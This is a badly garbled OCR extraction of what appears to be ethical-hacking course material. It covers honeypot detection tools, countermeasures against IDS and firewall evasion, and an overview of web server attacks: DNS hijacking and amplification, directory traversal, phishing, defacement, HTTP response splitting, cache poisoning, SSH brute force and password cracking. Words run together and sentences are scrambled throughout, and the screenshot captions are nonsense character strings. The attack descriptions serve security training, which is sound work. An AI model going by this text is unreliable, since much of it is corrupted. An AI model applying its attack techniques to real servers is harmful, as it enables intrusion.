honeynetsto blockknownattacksandavoid
and
attackerbouncing. Attackerscan identify these honeypots byanalyzing the outgoing
packets. If an outgoing packetis dropped,it might looklike a blackhole to an attacker,
andwhenthe snort_inline modifiesan outgoing packet, the attackercan capture the
modified packet through anotherhostsystem andidentify the packet modification,
Detecting the presenceof FakeAP: Fakeaccess pointsare thosethat create fake
802.11bbeaconframeswith randomly generated ESSIDand BSSID(MAC address)
assignments, Fakeaccesspointsonlysendbeaconframesbut do not produce any fake
trafficon the access points, andan attackercan monitor the networktrafficandquickly
note the presence offakeAP.
Detecting the presenceof Bait and SwitchHoneypots: Bait and switchhoneypots
actively participate i n securitymechanisms that are employed to respond quicklyto
incomingthreatsandmalicious attempts.They redirectall maliciousnetworktrafficto a
honeypot after any intrusion attemptis detected.An attackercan identify the presence
of suchhoneypots bylooking at specific
TCP/IP parameters suchas theRound-Trip Time
(RTT), the TimeTo Live (TTL), andthe TCPtimestamp.
[stsHoneypot
of Hunter
|@ SendSafe
HTTPS
SOCKS
proses
and
i tol for checking
designed
for "*honey
pot
Features
DetectionTools
Honeypot
Attackersuser honeypot Honeypot
detectiontoolssuchas Send-Safe Hunter(http://www.send-
safe.com) and kippo_detect (https://github.com)
to detect honeypotsi n the target
organizationalnetworks.
+
Honeypot
Send-Safe Hunter
Source:http://wwwsend?-safe.com
Send-Safe Hunteris a tool designed
Honeypot for checking
listsof HTTPS
andSOCKS
proxiesfor
Features:
"honey
pots."
‘Checks
listsof HTTPS, SOCKS4, andSOCKSS proxieswithanyports
Checks
several remote or localproxylists
at once
Canupload
Canprocessproxylists
"All
"Validproxies"and excepthoneypots'
automatically
i n every specified
period
filesto FTP
Maybeusedfor usual
proxylist
validating as well
ical andCountermensores
Mackin ©by E-Comel
Copyright
(@
end-SoteHoneypot
Hunter 32
[CFierHongyet
Proofstocheck Pron
Hurt>)
[] Send Sl e DEWOVetva
oie: Fins
Vek
ee
SlHomet
DEMO (CF
WSEAS Harte oe
Bonet
Send
Sate
Bonen
Fes Hare
DEMO
Hae
1AtewcrrenyeasVer
[6
Coganles 6
(@enSend
SueHermpa
Hermpa
OEM)
1s poi:
Nutro
Cormetn [TSR
ine Poe:
ead. (5p
Naber cretie:
[15
[7
Liter
lp,
SMTP
[raze
[25
Oe
RRL
Cec
st[0 boe:
lWitelogtoe Loglevet NoLepona
TO oe eve TResatcheckPw [AUTO
em 0100.00 StatedN/A
12.5%
Figure Sereenshotof
SendSafeHoneypot
Hunter
Module2 1588
Page tical andCountermensores
Making by Comet
Copyright©
ModuleFlow
@ | werrrovasvasioncountermennarn
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to DefendAgainst
IDSEvasion
‘aie
nominee
pt ony th ‘or h
at ca
norman tn tor
the
reaches IDS,
Ensurethat IDS normalizefragmented packets and allow those packets to be
reassembled in the properorder.
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to DefendAgainst
FirewallEvasion
earnest
a |Err
ais
nt rane
wh
mh
‘i sroete de vera sr ot
mane rnb
olce
How to DefendAgainst
Firewall Evasion
The firewallshouldbe configured
suchthat the IP addressof an intrudershouldbe
filteredout.
Setthe firewallrulesetto deny
alltrafficandenableonlytheservices required,
If possible,
create a uniqueuser ID to run the firewall services insteadof runningthe
usingtheadministratoror root ID.
services
Configure
a remote syslog server andadopt strict measuresto protectit frommalicious
Monitor
firewall
disable
Bydefault,
logs
at regular
all FTPconnectionsto or fromthe network
all suspiciousogentries found.
intervalsandinvestigate
identify
vulnerable
Runregular
riskqueriesto
Monitor user access
firewallrules
to firewallsandcontrolwho can modify
the firewallconfiguration.
Specify
the source anddestination IP addresses
as well as the ports.
Notify policy
thesecurity administrator
aboutfirewallchanges
anddocument
them.
accessto the firewall
Controlphysical
Takeregular
backups
of thefirewallrule set andconfiguration
files.
regular
Schedule firewallsecurityaudits.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Summary
Inthis
>
mode,
have
theand
we discussedfollowing
honeypot
105,18,frewal.and concepts solutions
to bypass Sean
\oroustechnigvs firewalls
Vriout105/Fewall
vation tools
Module Summary
Thismodulediscussed differentIDS,IPS, and honeypot
firewall, conceptsandsolutions. It also
describedvarious techniquesfor bypassingIDSandfirewalls.In addition,
it illustratedvarious
it explained
evasion tools.Further,
1DS/firewall howto detectanddefeathoneypots. Finally,it
ended with a detailed discussionof various countermeasures to be adopted to prevent
1DS/Firewallevasion attempts bythreatactors.
In the next module, i n detail howattackersas well as ethical
we will discuss hackers
andpen-
testers perform web server hacking to gain valuableinformationsuchas creditcardnumbers
andpasswords.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module13:
Hacking
WebServers
Module Objectives
Web
UnderstandingServer
Understanding
Concepts
WebServerAtak
Understanding
WebServerAtackMethodology
Module Objectives
Most organizations considertheir web presenceto be an extension of themselves.
Organizations maintainwebsites associated with theirbusinesso n the World Wide Webto
establishtheir web presence.Webservers are a criticalcomponent of web infrastructure.A
single
vulnerabilityin web server configuration may lead to a security breachon websites.
Therefore, is criticalto the normalfunctioning
webserver security of an organization.
Thismodulestarts with an overview of web server concepts.Subsequently,
it provides
insight
into various w b-serverattacks, attackmethodologies,andattacktools. Later,the module
describes countermeasuresagainst web server attacks,
patchmanagement, andsecuritytools.
[AtDescribe
+
will
theendof this module,
concepts
webserver
you beableto dothe following
+
various
web
webserver
Perform
attack
Describe server
attacks
methodology
Usedifferentweb server attacktools
Applyweb server attackcountermeasures
Describepatch management concepts
Usedifferent
webserver security
tools
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
WebServer WebServer
Concepts
WebServer
‘itacks ttack
‘Methodology
e °e
Counter:
Patch
e
measures
WebServer
Management Security
Tools
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebServerOperations
(©
Awebserver
isa system
that
computer anddelivers
stores, processes, webpages
to cents
via
HTTP
Components
of aWebServer
‘Application
DataStore
Application
Webclient
Figure
13.1:Typical
client-server
communication in webserver
operation
ical andCountermensores
Mackin ©by E-Comel
Copyright
Components of a WebServer
server consistsof the following
‘Aweb components:
=
DocumentRoot
Thedocumentroot is one of the root file directories of the web server that stores
criticalHTMLfilesrelatedto the web pagesof a domainname, whichwill be sent i n
responseto requests.
Forexample, if therequested URLis www. certifiedhacker.com
andthedocument
root is
/admin/web,
andis storedi n the directory
named“certroot― then/admin/web/certroot
is the document directory
address.
If the complete requestis www.certifiedhacker.com/P-folio/index.html,
the server will
/admin/web/certroot/?-folio/index.
searchfor the file path html.
Server Root
It is the top-level root directory under the directory tree i n whichthe server's
configurationand error, executable,andlogfilesare stored.It consistsof the codethat
implements the server. The server root,i n general,
consistsof fourfiles.Onefile is
dedicated to the code that implements the server, while the other three are
subdirectories,namely, -conf,-logs,
and -cgi-bin, which are usedfor configuration
information,logs,andexecutables, respectively.
VirtualDocumentTree
provides
A virtual documenttree storageon a different machineor disk after the
diskbecomes
original object-level
full. It is case-sensitiveand can be usedto provide
security,
In the above exampleunder document root, for a request of
www.certifiedhacker.com/P-folio/index.html,
the server can alsosearchfor the file path
folio/index.html
/admin/web/certroot/P if the directory admin/web/certroot is storedi n
another
disk.
Virtual Hosting
hosting
multiple
It is a technique
of domainsor websiteson the same server. This
allows of among
sharingresources
technique the
scalecompanies, i n various
servers.
employed It is in large-
which company resources are intended to be accessedand
managed
globally.
Thefollowing
are the typesof virtualhosting:
hosting
Name-based
© hosting
Internet Protocol(IP)-based
©.
hosting
Port-based
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
WebProxy
A proxy server is locatedbetweenthe web client and web server. Owing to the
placement of web proxies, all requestsfrom clientsare passed
on to the web server
throughthe web proxies.They are usedto preventIP blocking
andmaintain anonymity.
Open-sourceWebServerArchitecture
Open-sourceweb server architecturetypically Apache,
uses Linux, MySQL,and PHP,often
calledtheLAMPsoftware bundle,as the principal
components,
The following
are the functionsof the principal components web server
i n open-source
architecture:
=
Linuxis the operating
system of the webserver andprovides
(OS) a secure platform
=
Apache of the web server that handleseachHTTPrequestand
is the component
response
is a relational
MySQL usedto store thecontent andconfiguration
database information
of the webserver
layer
technology
PHPis the application dynamic
usedto generate web content
‘Site
Users siteAdmin tacks
aaSUw
ae 7
ANAT
Aplications
ical andCountermensores
Mackin ©by E-Comel
Copyright
It hasseveralcomponents, includinga protocol listenersuchas HTTP.sys
and services suchas
the World WideWeb Publishing Service (WWW Service)
and WindowsProcessActivation
Service(WAS). Eachcomponent functions i n application
andwebserver roles.Thesefunctions
may includelistening managingprocesses,andreading
to requests, configuration
files.
rT?
protocol
stack
(ores)
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebServerSecurity
Issues
“©:
Atackers
canbe
wal errors
using
targetsoftware
usualy
security
such
|G. NetworkandOSlve attacks
vunerabiliesa ndconfiguration t o compromisewebservers
be
defended propernetwork measures arewal
10S,
ete, However,
webservers ean accessedfromanyurnerei a theInterne, which
renders
ther highly
web
party BUA| of
Custom Appleton:
Components
‘id Server
I
Attacks Lotcrows
SpenSoure/commarssl
Impactof Web
9 compromise
werscouts
Web
Server Website © dtecement
Internet
Browser
o n Users
Computer
Website?
gure
13.4
Conceptual ofa webserver: the user visits websiteshosted
dlagram
ical
ona web
andCountermensores
Mackin
server
©by E-Comel
Copyright
Organizations can defendmost network-level and OS-level attacks by adopting network
securitymeasures such as firewalls, intrusion detection systems(IDSs), and intrusion
preventionsystems(IPSs) and by following securitystandardsand guidelines. Thisforces
attackersto turn their attention to web-server-and web-application-levelattacksbecausea
web server that hostsweb applications fromanywhere
is accessible over the Internet.This
makesweb servers an attractive target. Poorlyconfigured web servers can create
i n even the most carefully
vulnerabilities designedfirewallsystems.Attackerscan exploitpoorly
configured web servers with known vulnerabilitiesto compromisethe securityof web
applications.
organization,
Furthermore,
servers
web
Asshownin belowfigure,
with known vulnerabilities
organizational
security
can harmthe security of an
includesseven levelsfromstack
to 7
1 stack
Third-party
Components ©} OpenSource/Commercial
WebServer 5 L. —
Apache/Mmicrosoft
IIS
Database
System
Operating
BSOracle/Mysalymis
@®
Sat
Windows/tinux/os
x
a a
sss
135:Levels
Figure of organizational
security
CommonGoalsbehindWebServerHacking
Attackersperform web server attackswith certain goalsi n mind,Thesegoals maybe either
technicalor non-technical. For example, attackersmaybreachthe securityof a web server and
stealsensitive informationfor financialgainsor merely
for thesakeof curiosity
Thefollowing
are somecommon goals
ofwebserver attacks:
Stealing
details
sensitive
Integrating
credentials
credit-card
perform
phishing
techniques
(DoS)
or other
the server into a botnetto
using
denialof service or distributedDoS
(DDoS)
attacks
Compromisinga database
closed-source
Obtaining applications
Hiding redirecting
and traffic
+
Escalating
privileges
Someattacks
a re performed
for personal
reasons,ratherthanfinancialgains
For pure curiosity
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
a self-set
Forcompleting challenge
intellectual
For
Dangerous
Security
the
FlawsAffecting
targetreputation
damaging organization’s
WebServerSecurity
A web server configured bypoorly trained systemadministrators may have security
vulnerabilities.Inadequate knowledge, negligence,laziness, and inattentiveness toward
securitycan posethe greatestthreatsto webserver security.
following
‘The are some common oversights that makea web server vulnerableto attacks:
=
Failing
to updatethewebserver withthe latestpatches
‘=
=
the
Using same
Allowing
credentials
system administrator everywhere
unrestrictedinternalandoutboundtraffic
=
of Web
Impact
Running
Server
Attacks
and
servers
applications
unhardened
ical andCountermensores
Mackin ©by E-Comel
Copyright
Whyare WebServersCompromised?
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing thatcan compromise
are some oversights a webserver:
=
Improperfile anddirectory
permissions
Unnecessary
thewith
Installing server
‘=
default and
services
enabled,
settings
includingcontent management
remote
administration
Security conflictswith thebusiness’
ease-of-userequirements
Lackof propersecuritypolicy, procedures,andmaintenance
Improper authenticationwith externalsystems
Defaultaccountswith defaultor no passwords
Unnecessary default, backup,
or samplefiles
Misconfigurations i n the webserver, OS,
andnetworks
Bugsi n server software, OS,andweb applications
Misconfigured SecureSockets Layer certificates
(SSL) andencryption
settings
or debugging
‘Administrative functionsthatare enabledor accessible
on web servers
of
Use self-signed
certificatesanddefaultcertificates
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
e e e
WebServer WebServer WebServer
Concepts itacks ttack
‘Methodology
e °e
Counter:
Patch
e
measures
WebServer
Management Security
Tools
Web ServerAttacks
attackercan use manytechniques
‘An to compromise a web server, suchas DoS/DDoS, Domain
NameSystem (ONS) DNSamplification,
server hijacking, directory man in the middle
traversal,
(MITM)/sniffing,phishing,websitedefacement,web server misconfiguration,HTTPresponse
web cachepoisoning,SecureShell(SSH)
splitting, bruteforce,andweb server password
cracking.
Thissectiondescribes theseattacktechniquesi n detail
ical andCountermensores
Mackin ©by E-Comel
Copyright
DoS/DDoSAttacks
Attackers
to
t numerous
hefake
maysend
i t unavallble legimate
to thewebserver, which
requests
users,
causes webserver rashingor makes
steal
services to card
payment
and
profile servers
user credentials
such banks, gateways, government
DoS/DDoSAttacks
A.D0S/DDoS attackinvolvesfloodingtargetswithcopiousfakerequests so that the targetstops
functioning and becomesunavailableto legitimate users. Byusing a web server DoS/DDoS
attack,an attackerattempts to takethewebserver downor makeit unavailable to legitimate
users. A web server DoS/DDoS attackoften targetshigh-profileweb servers suchas bank
servers, credit-card
payment gateways,andeven root name servers.
memory
Application handling.
exception
=
=
Hard-disk
Database
space
space
mechanism
ical andCountermensores
Mackin ©by E-Comel
Copyright
DNSServer Hijacking
“e
=
=a
oe
DNS Server Hijacking
The Domain Name System (DNS) a domainname to its corresponding
resolves IP address.A
User queriesthe DNSserver with a domainname, and the DNSserver respondswith the
corresponding
IP
address.
In DNSserver hijacking, a DNSserver andchanges
an attackercompromises its mapping
settingsto redirecttowarda rogueDNSserver that wouldredirectthe user’s to the
requests
attacker'srogueserver. Consequently, whentheuser entersa legitimate the
URLi n a browser,
will redirectto theattacker'sfakesite.
settings
necchet
| cs oes
oremes
‘themalious wetite
ormserver
checks
ns the OMS
respective
“jacane― .
ONSServer(Target) Users(Viti) Legitimete
site
Figure
13.7;
jacking
NS server
ical andCountermensores
Mackin ©by E-Comel
Copyright
DNSAmplification
Attack
(©Attacker
takesadvantage
ofthe DNS
recursive method
of
DNS redirectionto performONS attacks
amplification
.*
DNSAmplification
Attack (Cont'd)
(2 tctr wer compromisedPs wth pooted
Padeses to amplytheODS atc
onVin ON server
iT as |
DNS Amplification
Attack
Recursive DNSquery is a methodof requesting ONSmapping.Thequerygoesthrough DNS
servers recursively
until it failsto findthe specified
domainname to IPaddressmapping,
Module3 1608
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
The following are the stepsinvolvedin processing thesestepsare
recursive DNSrequests;
illustratedi n thebelowfigure.
=
Step1:
Userswhodesireto resolve a domainname to its corresponding
IP address
senda ONS
query to the primary DNS
properties. server
specified ControlProtocol(TCP)/IP
i n its Transmission
Steps 2to 7:
If the requested
DNSmappingdoes not exist on the user'sprimaryDNSserver,the
server forwardsthe request
to the root server. Theroot server forwardsthe request
to
the .com namespace, where the user can find DNSmappings.Thisprocessrepeats
recursively
Step
8:
until
theDNSmappingis resolved.
o6
13.8:Recursive
Figure DNSquery
Step 2:
All the compromisedhostsspoof
thevictim’s IPaddressandsendDNSqueryrequests
to
the primaryDNSserver configured
i n the victim'sTCP/IP
settings.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Steps 3 to 8:
If the requestedDNSmappingdoesnot exist on the victim'sprimaryDNSserver,the
server forwardsthe requests
to the root server. Theroot server forwardsthe requestto
the .com or respective top-leveldomain (TLO) namespaces. This processrepeats
recursively
until the victim'sprimaryDNSserver resolves
the DNSmappingrequest.
Step
9:
Afterthe primaryDNSserver findsthe ONSmappingfor the victim’s it sendsa
request,
DNS mappingresponse to the victim'sIP address.This response goesto the victim
becausebotsuse thevictim’s
IPaddress. Therepliesto copiousDNSmappingrequests
on DNS
fromthe botsresulti n DDoS the victim’sserver.
13.9:D NS
Figure amplifeation
attack
ical andCountermensores
Mackin ©by E-Comel
Copyright
TraversalAttacks
Directory
©
Indirectory
traversal
attacks,
attackers
./ sequence
directory access
restricted
theweb server root
‘Outside
“eAstacers
can use the tril anderror
usethe (dotdot slash)
methodto navigate
outside
theroot
to
andacces
directory
directories
sensitive
information
inthesystem
pte
fen
pi fermccom/ert
Peds!
Systomiziemdont/e
‘areek
TraversalAttacks
Directory
attackermay be ableto perform
‘An a directory
traversalattackowing to a vulnerability
i n the
codeof a web application.
In addition,poorlypatched or configured
webserver software c an
maketheweb server vulnerableto a directory
traversalattack,
The design of web servers limits publicaccess to some extent. Directory traversalis the
exploitation of HTTPthrough which attackers c an access restricteddirectoriesand execute
commands outsidethe webserver'sroot directory bymanipulating a UniformResource Locator
(URL). In directory attackersuse the dot-dot-slash(.,/)sequenceto access
traversalattacks,
restricteddirectoriesoutsidethe web server'sroot directory. Attackerscan use the trial-and-
error methodto navigate outsidethe root directory andaccesssensitive information i n the
system.
attackerexploits
‘An the web server software(webserver program)
to perform
directory
traversalattacks.Theattackerusually performsthisattackwiththe helpof a browser.A web
server is vulnerableto this attackif it accepts
inputdata from a browserwithout proper
validation.
ical andCountermensores
Mackin ©by E-Comel
Copyright
neoerver come
phase. [Window
Srstema2jemd.em?/c
sire
Figure
traversal
13.10Dectory attack
Module3 2612
Page tical andCountermensores
Making by Comet
Copyright©
Attack
Man-in-the-Middle/Sniffing
D
A)
4
Nennthesi wan attaches to aces
Conmunistionsbetweenan endseerandwe servers
nation by Interception
altering
®woawacie
pro
tat the
wer
ad
wses. sueh al communication
between
Attack
Man-in-the-Middle/Sniffing
Man-in-the-middle(MITM) attacksallow an attacker to access sensitive information by
intercepting and alteringcommunicationsbetweenan enduser andwebservers. In an MITM
attackor sniffingattack, an intruderintercepts or modifiesthe messages exchanged between
the user and web server byeavesdropping or intruding into a connection.Thisallowsan
attackerto steal sensitive user Information,suchas online banking details,usernames, and
passwords, transferredover the Internet to the web server. Theattackerluresthe victim to
connect to the web server bypretending to be a proxy.If the victim believesand acceptsthe
attacker'srequest, then all the communication betweenthe user and web server passes
through theattacker.In this manner,theattackercan stealsensitive user information.
‘iacker
13.11:
Figure Maninthe-midale/snifing
attack
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attacks
Phishing
eo»
<p este
ating
°
Attacks
Phishing
perform
‘Attackers a phishing attackbysending an emailcontaining a maliciouslinkandtricking
the user into clicking
it. Clicking
the linkwill redirectthe user to a fakewebsitethat appears
similarto the legitimate website,Attackerscreate suchwebsitesbyhosting their addresso n
servers. When a victim clickson the malicious
‘web link while believingthe link to be a
legitimate websiteaddress, the victim is redirectedto the maliciouswebsitehostedon the
attacker'sserver. The website promptsthe user to enter sensitive information, such as
usernames, passwords, bank account details,and socialsecurity numbers, and divulges the
datato the attacker.Later,the attackermaybe ableto establisha session with the legitimate
websitebyusingthe victim'sstolencredentialsto perform maliciousoperations on the target
legitimate website.
©
victim WebServerHosting
Target
Lepitimate
ry
Webste
Figure
é
arracker
23.12Phishing
attacks
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebsiteDefacement
Webdefacement
intruder accuts
when an
byinsertingor substituting
proves,
eect ed
data
offending
You are OWNEDI!II!
‘ormiseading
HACKED!
unl theunauthorized
and
information
changesare discovered Hi Master,Yourwebsiteis
corrected byUS,Hackers!
‘owned
‘attackers
use
a
varietyof methods
"Nexttarget microsoft.com
~
{site in
to
order deface
it
WebsiteDefacement
Websitedefacementrefersto unauthorizedchanges madeto the content of a singleweb page
or an entire website, i n changes
resulting
Hackersbreakinto web servers andalter the hostedwebsitebyinjecting
popups,or text to a pagei n sucha manner that thevisualappearance
of
to the visualappearance thewebpageor website.
codeto add images,
of the pagechanges. In
some cases, theattackermayreplace
of
the entire websiteinstead just changing a single
page.
HACKED!
HiMaster,
Your
‘owned website
is
byUS,Hackers!
Next target microsoft.com
-
13.12:
Figure Screenshot
awebsite
displaying
ical
defacement
attack
andCountermensores ©
Mackin by E-Comel
Copyright
Defaced pagesexposevisitors to propaganda or misleading
informationuntilthe unauthorized
changes are discovered and corrected,Attackersuse a varietyof methods,suchas MySQL
to accessa websiteto deface
injection, to changing
i t. In addition thevisualappearance ofthe
targetwebsite,attackersdefacewebsitesfor infecting the computers of visitors bymaking
the
websitevulnerable to virus attacks.Thus, websitedefacement not onlyembarrasses thetarget
organizationbychanging
of
the appearance its websitebut is alsointendedto harmits visitors.
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebServerMisconfiguration
|G.Servermiconfiguration
fers weaknesses
to configuration inwe
that
infastructre canbeexploited
t launch
WebServer
erore Dabuaror
Misconfiguration
Messe [a
Web
Server
Misconfiguration
son
Thecestgunion
Examples
erent
epdconth e
onan apache
server
‘
ho in fle
WebServerMisconfiguration
Webserver misconfiguration refersto the configurationweaknesses i n webinfrastructure
that
can beexploited to launchvarious attacks o n webservers, suchas directorytraversal,
server
intrusion,anddatatheft.Thefollowing are some web server misconfigurations:
+
Verbosedebug/error
messages
+
+
or
default
Anonymous users/passwords
configuration
Sample andseriptfiles
+
Remoteadministration
functions
+
+
Unnecessary
enabled
Misconfigured/default
services
SSLcertificates
Example
‘An
Server
of a Web Misconfiguration
“Keeping configuration
the server secure requiresvigilance―—Open
WebApplication
Security
Project
(OWASP)
Administrators who configure
web servers improperly may leaveserious loopholes i n the web
server, therebyprovidingan attackerthe chanceto exploit the misconfigured web server to
compromise and obtain sensitive information.Thevulnerabilitiesof improperly
its security
configured web servers may be relatedto configuration, applications, files,scripts,or web
pages.An attacker searchesfor such vulnerableweb servers to launch attacks.The
misconfigurationofa webserver provides the attackera path to enter thetargetnetworkof an
organization, These loopholes i n the server can also helpan attacker bypass user
ical andCountermensores
Mackin ©by E-Comel
Copyright
authentication. theseproblems
Oncedetected, exploited
can be easily and mayresultin the
a
total compromiseof websitehostedon the target
As showni n the belowfigure,
web server.
the configuration
mayallow anyoneto view the server status
page,whichcontains detailedinformationaboutthe current use of the web server, including
being
informationaboutthe current hostsandrequests processed
Asshowni n
gute
thebelow
13.14:
the on
Screenshot
figure, configuration
the
an
displaying httpd.conf
le Apache server
maygiveverboseerror messages.
display_error =
on
log_errors =
On
error_log =
syslog
12.15;
Figure Screenshotdsplayng
the php.ini
ical andCountermensores
Mackin ©by E-Comel
Copyright
HTTPResponse-Splitting
Attack
into the
responsedata = theinputfl so that server splts
Input son
User
T h e attacker
fre
toa
can
malclous
discarded
MOY
contoltheft response
website
to redirect
the
whereasthe otherresponses
bythewebbrowser
Sectors
(AUTHOR_PARM)
equeat.getPeranater
setaanaze
(cookiazsptration)
fsothor)
Ssokie
HTTP Response-Splitting
Attack
HTTPresponse-splitting
‘An attackis a web-based attacki n whichthe attackertricksthe server
byinjectingnew linesinto responseheaders, along with arbitrary code.It involvesadding
headerresponse data into the inputfield so that the server splitsthe responseinto two
responses. Thistypeof attackexploits vulnerabilities
i n inputvalidation. Cross-site scripting
(XS5), cross-site requestforgery (CSRF), and StructuredQuery Language (SQL) injectionare
examples of this typeof attack.In this attack, the attackercontrolsthe inputparameterand
cleverly constructsa request headerthat elicitstwo responses from the server. Theattacker
altersa singlerequest to appear as two requests byadding headerresponse datainto the input
field.Thewebserver, in turn, responds to eachrequest. Theattackercan passmaliciousdatato
a vulnerableapplication, andthe application
attackercan controlthe firstresponse
includes in an
the
data
to redirectthe user to a maliciousHTTP
response
website,
header.The
whereasthe
web
browser
will discardother responses.
ical andCountermensores
Mackin ©by E-Comel
Copyright
on
eenat
~
ened
cookie
aetitaxhge
(cookieExpiration)
Figure
13.16:HTTP
Response attack
Splitting
Example
of
In this example,
Response-Splitting
a n HTTP Attack
the attackersendsa response-splitting requestto the web server. Theserver
splitsthe responseinto two and sendsthe first responseto the attackerand the second
responseto the victim. After receivingthe responsefromthe web server, the victim requests
byproviding
service credentials.Simultaneously, the attackerrequests
for the indexpage.
Subsequently, requestto the attacker,
the web server sendsthe response to the victim’s and
the victim remains uninformed.
Victim,
coe 13.17;Example
Figure ofanHTTPresponse-spliting
attack
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebCachePoisoning
Attack
© {were
WebCachePoisoning
Attack
Webcachepoisoning damages the reliability
of an intermediateweb cachesource. In this
attack,an attackerswapscached
webcachesource mayunknowingly
content whenrequesting
a
content for random
use the poisoned
therequired URLthrough
URLwithinfected content.Usersofthe
content insteadof the true andsecured
theweb cache.
An attacker
forces thewebserver's cache to flushits actualcachecontent andsendsa specially
craftedrequest to store i n the cache.In this case,all the users of that web server cachewill
receive maliciouscontent untilthe servers flushthe webcache.Webcache poisoningattacks
are possible
if theweb server andapplication haveHTTPresponse-splitting flaws.
ical andCountermensores
Mackin ©by E-Comel
Copyright
forcesthe
web servers cacheto
flushts actualcache
contentands ends8
crafted
Specially
request,whichwillbe
stored in cache
— —
Figure
cache
13.18:Web poisoningattack
Module3 1622
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
SSHBruteForceAttack
58Hprotocols
are used to createan SSH
encrypted tunnelbetweentwo host to transfer
unenerypted
‘aches
‘8H
tunnelscan beusedtotransmit malwaresan
to
credentials gon unauthorized
can brutefree SSHlogin
otheexploits
ovis
access to an SSHtunnel
withoutbeing
detected
E>
SSHBruteForceAttack
Attackersuse SSHprotocols to create an encryptedSSHtunnelbetweentwo hoststo transfer
unencrypted dataover an insecure network.Usually, SSHruns on TCPport22. To perform an
attackon SSH,
obtainslogin
an attackerscansthe entire SSHserver usingbots(performs
port22)to identify possible
credentialsto gainunauthorized
Withthe help
vulnerabilities.
a portscan on TCP
of a brute-forceattack,
the attacker
a ccessto an SSHtunnel.Anattackerwhoobtains
the login credentialsof SSHcan use the same SSHtunnelsto transmit malwareand other
meansof exploitation to victims without being detected.Attackersuse toolssuchas Nmap and
Neracko n a Linuxplatform to perform an SSHbrute-forceattack.
13.19:
Figure SSHBruteForce
attack
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebServerPasswordCracking
‘a
tres
Anattacer
to
empl
to
hack
passwords
wennests wellchosen
can
be by
Passwords crackedmanuallyguesingor byperforin dictionary,
rte force,
andhybrid tack sing avtomated
WebServerPasswordCracking
Analttackerattemptsto exploit
weaknesses passwords.
to hackwell-chosen Themost common
passwords found are password, root, administrator,
admin,demo,test,guest,qwerty,pet
names,and so on. Theattackermainly targetsthe following
through
web server password
cracking:
SMTPandFTPservers
Web shares
SSHtunnels
Webformauthentication
Attackersuse differentmethodssuchas socialengineering,spoofing, phishing,a Trojanhorse
andkeystroke
or virus, wiretapping, loggingto perform
web server password cracking.
In many
hracki
ng attempts,
a
theyare validuser.
the attackerstarts with passwordcracking
to proveto the web that
server
Cracking
WebServerPassword Techniques
Password cracking is the most common methodof gainingunauthorized
access to a web server
byexploiting flawedandweakauthentication Oncethe password
mechanisms. is cracked, an
attadkercan use the password to launchfurtherattacks.
We present some detailsof various toolsandtechniques usedbyattackersto crackpasswords.
can use password
‘Attackers cracking techniquesto extract passwords
from web servers, FTP
servers, SMTPservers, andso on. They can crackpasswords either manually
or with automated
toolssuchas THCHydra, Nerack, andRainbowCrack.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing attackersuse to crack
are some techniques passwords:
=
Guessing: Thisis the most common methodof cracking passwords.In thismethod,the
attackerguessespossible passwordseither manually or by usingautomatedtools
provided with dictionaries.Most people tend to use their pets’
names, loved ones’
names, licenseplatenumbers, dates of birth,or other weak passwords suchas
“QWERTY,― “admin,―
“password,― etc. so that theycan rememberthem easily. The
attackerexploitsthishumanbehaviorto crackpasswords.
Dictionary
attack:A dictionary
attack uses a predefined
file containing
various
combinations of words,andan automatedprogram
checkif any of them are the password,
includesspecialcharactersandsymbols.
entersone
at
thesewords a time to
Thismightnot be effectiveif the password
If the password is a simpleword,thenit can be
found quickly. Compared to a brute-forceattack, a dictionary attack is lesstime
consuming,
Brute-forceattack:In the brute-forcemethod, all possible charactercombinations a re
tested;for example,the test mayinclude combinations of uppercase characters fromA
to Z,numbersfrom0 to 9,andlowercase characters froma to z. Thismethodis useful
for identifying
one-wordor two-wordpasswords. If a password consists of uppercase
and lowercaselettersas well as special characters, it might take monthsor yearsto
crackthe password usinga brute-forceattack.
Hybrid
attack:A hybrid
attackis more powerful
thantheabovetechniques
because
it
uses both a dictionary
attackandbrute-forceattack.It alsouses symbols
andnumbers.
cracking
Password is easier
with thismethodthan with theabovemethods.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Server-SideRequest
Forgery Attack
(SSRF)
(2 acters expoSRFvlnrabtes na
pubic
web
server
send
to
requests
othe
intemal
servers
crated aback end
ical andCountermensores
Mackin ©by E-Comel
Copyright
artacker
Firewall
13.20:
Figure Demonstration
ofSRFattack
D atabase
Server
une
WebApplication
Attacks
weba the
web
servers
(©Wonerabitesnwebappliations
runningon
a stackpath
serverarovde broad forcompromising
Parameter/Form
Tampering cookie
T ampering inputa ndF l ijection
‘Unvalidated
Paes
Injection
attacks
SesionMipeing SQL Dietaryravers
Service
Deni
SeriptingOverfow
oss
ste tacks
(O08)
atack (SS)tacks Butler
WebApplication
Attacks
Evenif web servers are configured
securelyor are securedusingnetworksecurity m easures
suchas firewalls,a poorly
codedweb application deployedon the web server mayprovide a
web
application.
authenticatedpartsof a
SQLInjection exploits
Attacks: SQLinjection thesecurity vulnerability
of a database
for
attacks.Theattackerinjectsmalicious whichare later passed
codeinto the strings, on to
theSQLserver for execution.
ical andCountermensores
Mackin ©by E-Comel
Copyright
traversal is the exploitation
Traversal:Directory
Directory of HTTPthrough
which
attackerscan access restricteddirectoriesand execute commands
outsideof the web
root directory
server's bymanipulating
(DoS)
Denial-of-Service
aURL.
Attack:A DoSattackis intendedto terminate the operations
of
website or server
‘a to makeit unavailable
for access byits intendedusers
Scripting
Cross-Site (SS)Attacks:In this method,
an attacker
injectsHTMLtagsor
